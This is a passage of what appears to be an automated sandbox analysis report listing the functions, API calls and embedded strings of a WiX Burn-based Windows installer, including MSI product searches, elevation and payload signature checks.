                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3037633208
                                                                                                                                                                                                                                                                                                  • Opcode ID: 45d160fdc69c0a81a918dcdf09c1c567ebb437598184813727ac85838ef75aa6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19874a102214621ecba61439f051167e41f9d95dbc479ab3c42f4eb88c2fed20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d160fdc69c0a81a918dcdf09c1c567ebb437598184813727ac85838ef75aa6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B17C31584606AFCB24DF94CC85F9B7BA7AF44730F258668F9A5AB2D1DB70E841CB40
                                                                                                                                                                                                                                                                                                  Function 005CA03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 005CA0B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2134270738
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6816b09fb17aaf51b654b6a1a1fd8d7625f39013f800f16fc365d06a4e7f3133
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ed223fd7001f0c0554f953cf31441f496a2b467cfc87f1d70b1dbc1a724fc57
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6816b09fb17aaf51b654b6a1a1fd8d7625f39013f800f16fc365d06a4e7f3133
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C961B036D8012DAFDB159AE88D49FAF7F6AFB44318F14056DF900BA281D2339E00D792
                                                                                                                                                                                                                                                                                                  Function 005DF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C394F: RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 005DF06E
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 005DF19B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy the arguments., xrefs: 005DF12D
                                                                                                                                                                                                                                                                                                  • Failed to copy the id., xrefs: 005DF100
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 005DF17C
                                                                                                                                                                                                                                                                                                  • Failed to post launch approved exe message., xrefs: 005DF186
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 005DF089
                                                                                                                                                                                                                                                                                                  • UX requested unknown approved exe with id: %ls, xrefs: 005DF0CE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1367039788-528931743
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ff51625bcf41963b9675f16d553a4286b74768e288b6a3580f004abb2b941c7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3987def79cd3ecfac0a70269a495e5e44d4492a6817e36ac43624797cec5b989
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff51625bcf41963b9675f16d553a4286b74768e288b6a3580f004abb2b941c7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31B332A41226EFDB219FA8DC09E5B7BA9BF04720B058567BD06EB351E731DD00C7A0
                                                                                                                                                                                                                                                                                                  Function 005C6037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 005C6062
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 005C6076
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C6088
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 005C60DC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C60E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 005C6124
                                                                                                                                                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 005C60C4
                                                                                                                                                                                                                                                                                                  • Failed to get the Date., xrefs: 005C610B
                                                                                                                                                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 005C60AD
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 005C60A3, 005C6101
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                                                                                                                                                  • Opcode ID: b836ad3946cdb29ed93d814a245c09412a3da9813a984f204a291c526a05578b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e01a463dbb92f66892a12ab093c64760ee16d7eb72249d31ba8af370ef35f72
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b836ad3946cdb29ed93d814a245c09412a3da9813a984f204a291c526a05578b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E931A932A8062A7FDB119BE9CC46FAFBFB9BB44710F114529FE01F7181D6619E4086E1
                                                                                                                                                                                                                                                                                                  Function 005D41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600523: EnterCriticalSection.KERNEL32(0062B5FC,00000000,?,?,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 00600533
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600523: LeaveCriticalSection.KERNEL32(0062B5FC,?,?,0062B5F4,?,005D4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005C54FA,?), ref: 0060067A
                                                                                                                                                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 005D4212
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 005D421E
                                                                                                                                                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,006139D4,00000000), ref: 005D426B
                                                                                                                                                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 005D4272
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1844635321-1389066741
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0381ff00d81a9b1afe6ba40d946507e433ad5ac92290827b78660de7b1ecf392
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad8b3d9572a0e6186939810c09d91b38f8ffe6c1a7167f6b2068dc68c4f2c980
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0381ff00d81a9b1afe6ba40d946507e433ad5ac92290827b78660de7b1ecf392
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF0A43BAC56717BA73122661C0EEBB5C6EEED6F21B07011ABD12F5380EB548D4184F4
                                                                                                                                                                                                                                                                                                  Function 005DA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy source path., xrefs: 005DA31A
                                                                                                                                                                                                                                                                                                  • Failed to get bundle layout directory property., xrefs: 005DA287
                                                                                                                                                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 005DA1A1
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 005DA1B7
                                                                                                                                                                                                                                                                                                  • Failed to combine last source with source., xrefs: 005DA210
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 005DA26C
                                                                                                                                                                                                                                                                                                  • Failed to get current process directory., xrefs: 005DA1F3
                                                                                                                                                                                                                                                                                                  • Failed to combine layout source with source., xrefs: 005DA2A4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 2767606509-3003062821
                                                                                                                                                                                                                                                                                                  • Opcode ID: c1510c20adbf2fc0ab0b644abb47f11d897aaa375af00748bde25752aab45fe6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 38b015aa9c1c5e5d49f459f6a2ae2d9c61863b92ebd765166ea29c57cd63783b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1510c20adbf2fc0ab0b644abb47f11d897aaa375af00748bde25752aab45fe6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62715B71D01219AFCF269FA8C845AEFBBBABF08310F15052BE901B7250E7719D40CB62
                                                                                                                                                                                                                                                                                                  Function 005C3076 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 005C30C1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C30C7
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 005C3121
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3127
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C31DB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C31E5
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C323B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3245
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                                                                                                                                                                  • String ID: pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1547313835-741606033
                                                                                                                                                                                                                                                                                                  • Opcode ID: b515c2e219ea5a1c8d39264d1f5e9e8622444e80a2f89933b3651cb4bd6b17c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: c8d093acb6531f33b53953702dfcda33f1a15e15a08f576a80839e13d25e57aa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b515c2e219ea5a1c8d39264d1f5e9e8622444e80a2f89933b3651cb4bd6b17c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42619F77D4022EAFDF219AE48848F9EBEA9BB04750F158169EE01BB250E7759F0097D0
                                                                                                                                                                                                                                                                                                  Function 005D50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0060B500), ref: 005D50D3
                                                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 005D5171
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 005D518A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentHandle
                                                                                                                                                                                                                                                                                                  • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                                                                                                                                                  • API String ID: 2815245435-1352204306
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2d433b448fe655caa9927242331f14dc455fa9e4f0c3e4b37d73aadb8b60a773
                                                                                                                                                                                                                                                                                                  • Instruction ID: dff630c850195ff945090714599140795640c1dc7ac7ee7cc93f3609f1041f89
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d433b448fe655caa9927242331f14dc455fa9e4f0c3e4b37d73aadb8b60a773
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A215971940619BFDF219FD8C841AAEBBBAFB08350B10816AF811A2211E7319E50DB90
                                                                                                                                                                                                                                                                                                  Function 005C1175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1186
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C1191
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005C119F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11BA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005C11C2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,005C111A,cabinet.dll,00000009,?,?,00000000), ref: 005C11D7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                                                                                                                                                  • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                                                                                  • API String ID: 3104334766-1824683568
                                                                                                                                                                                                                                                                                                  • Opcode ID: f8baa082b0a849b298cea98afabadb0ec5f2b0cf659ef83e9747a2f8d349d500
                                                                                                                                                                                                                                                                                                  • Instruction ID: 24050bed4cd708fcc3db0277c153b3d8273c8d47f4560be0c94e0d610c89856f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8baa082b0a849b298cea98afabadb0ec5f2b0cf659ef83e9747a2f8d349d500
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7901DE3128061ABEC7116FE29C09E6F7F1DFB427A0B04E019BA1692141EB749A00CAA4
                                                                                                                                                                                                                                                                                                  Function 005DD24B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 118threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,005DAD40,?,00000000,00000000), ref: 005DD2E9
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005DD2F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005DCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,005DD365,00000000,?,?,005DC7C9,00000001,?,?,?,?,?), ref: 005DCF37
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005DCF25: GetLastError.KERNEL32(?,?,005DD365,00000000,?,?,005DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 005DCF41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,005DC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 005DD376
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QE\$elevation.cpp$fT\
                                                                                                                                                                                                                                                                                                  • API String ID: 3606931770-3685454459
                                                                                                                                                                                                                                                                                                  • Opcode ID: 293084f2a6b59b613e2b70ed345fff510de02e060f31a5ba3b51265f1216ebfd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43ebe5b934565691f514605d32b81b2fb7fc0749aeed001675be2dfbc67e0acb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293084f2a6b59b613e2b70ed345fff510de02e060f31a5ba3b51265f1216ebfd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D54105B6D45219AFCB14DFA9D8859DEBBF9FF48310F10412AF904E7340E770A9408BA4
                                                                                                                                                                                                                                                                                                  Function 005D9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,005D9F04,00000003,000007D0,00000003,?,000007D0), ref: 005D90B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 005D90BF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,005D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 005D9187
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 005D9103
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 005D914E
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 005D90F6
                                                                                                                                                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 005D912F
                                                                                                                                                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 005D9172
                                                                                                                                                                                                                                                                                                  Memory Dump Source
